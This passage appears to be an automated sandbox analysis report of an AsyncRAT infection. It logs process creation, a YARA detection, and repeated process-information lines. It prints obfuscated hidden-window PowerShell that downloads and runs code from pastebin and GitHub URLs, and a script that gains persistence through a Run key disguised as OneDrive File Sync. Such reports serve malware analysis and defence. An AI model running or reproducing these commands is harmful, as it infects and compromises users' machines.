              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) Jump to behavior
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF887CE54B8 pushfd ; iretd 1_2_00007FF887CE5591
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CE785E push eax; iretd 10_2_00007FF887CE786D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CE782E pushad ; iretd 10_2_00007FF887CE785D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CE756B push ebx; iretd 10_2_00007FF887CE756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887CE7450 push ebx; iretd 10_2_00007FF887CE756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF887DA6DC3 push edi; iretd 10_2_00007FF887DA6DC6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CD794D push ebx; retf 13_2_00007FF887CD796A
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dllJump to dropped file

              Boot Survival

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Powershell creates an autostart link
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Tries to open files direct via NTFS file id
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
